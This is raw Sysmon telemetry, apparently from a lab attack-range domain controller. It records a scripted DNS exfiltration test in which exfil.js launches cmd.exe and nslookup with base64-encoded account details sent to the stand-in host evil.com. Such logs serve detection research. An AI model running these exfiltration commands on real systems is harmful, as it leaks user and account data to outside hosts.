14:21:42.939{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212825Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.939{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18F6-629A-3645-000000005F02}5692C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000212824Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.939{2E1864BB-18F6-629A-3445-000000005F02}38327024C:\Windows\system32\cmd.exe{2E1864BB-18F6-629A-3645-000000005F02}5692C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000212823Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.943{2E1864BB-18F6-629A-3645-000000005F02}5692C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IERlZmF1bHRBY2NvdW50 evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18F6-629A-3445-000000005F02}3832C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IERlZmF1bHRBY2NvdW50 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nljinz.tmp 2>&1 10341000x8000000000000000212822Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.924{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18F6-629A-3545-000000005F02}6604C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212821Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.924{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18F6-629A-3545-000000005F02}6604C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212820Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.908{2E1864BB-18F6-629A-3545-000000005F02}66044344C:\Windows\system32\conhost.exe{2E1864BB-18F6-629A-3445-000000005F02}3832C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212819Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.908{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18F6-629A-3545-000000005F02}6604C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000212818Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.908{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212817Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.908{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212816Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.892{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212815Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.892{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212814Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.892{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18F6-629A-3445-000000005F02}3832C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000212813Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.892{2E1864BB-18E0-629A-6742-000000005F02}39766072C:\Windows\System32\WScript.exe{2E1864BB-18F6-629A-3445-000000005F02}3832C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000212812Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.906{2E1864BB-18F6-629A-3445-000000005F02}3832C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IERlZmF1bHRBY2NvdW50 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nljinz.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000212811Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.892{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlclb.tmpMD5=6549F05B1861103256248974C2999EAD,SHA256=419CF8C4CFB601A92C88A029ACF678E4FE5D927543E581B1FD8233D6D0B2C4E4,IMPHASH=00000000000000000000000000000000falsetrue 22542200x8000000000000000212810Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.798{00000000-0000-0000-0000-000000000000}6984evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000212809Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.722{00000000-0000-0000-0000-000000000000}1220evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000212808Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.660{00000000-0000-0000-0000-000000000000}2088evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000212807Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.582{00000000-0000-0000-0000-000000000000}6652evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000212806Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.503{00000000-0000-0000-0000-000000000000}3300evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000212805Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.408{00000000-0000-0000-0000-000000000000}5404evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000212804Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.340{00000000-0000-0000-0000-000000000000}8012evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000212803Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.278{00000000-0000-0000-0000-000000000000}6372evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000212802Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.201{00000000-0000-0000-0000-000000000000}5836evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000212801Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.144{00000000-0000-0000-0000-000000000000}4284evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000212800Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.090{00000000-0000-0000-0000-000000000000}3872evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000212799Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.030{00000000-0000-0000-0000-000000000000}3396evil.com0::ffff:127.0.0.1;<unknown process> 10341000x8000000000000000212798Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.871{2E1864BB-18F6-629A-3245-000000005F02}8020608C:\Windows\system32\conhost.exe{2E1864BB-18F6-629A-3345-000000005F02}3452C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212797Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.871{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18F6-629A-3345-000000005F02}3452C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000212796Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.871{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212795Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.871{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212794Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.871{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212793Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.871{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212792Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.871{2E1864BB-18F6-629A-3145-000000005F02}64925700C:\Windows\system32\cmd.exe{2E1864BB-18F6-629A-3345-000000005F02}3452C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000212791Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.876{2E1864BB-18F6-629A-3345-000000005F02}3452C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18F6-629A-3145-000000005F02}6492C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlclb.tmp 2>&1 10341000x8000000000000000212790Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.839{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18F6-629A-3245-000000005F02}8020C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212789Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.839{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18F6-629A-3245-000000005F02}8020C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212788Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.839{2E1864BB-18F6-629A-3245-000000005F02}8020608C:\Windows\system32\conhost.exe{2E1864BB-18F6-629A-3145-000000005F02}6492C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212787Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.839{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18F6-629A-3245-000000005F02}8020C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000212786Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.824{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212785Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 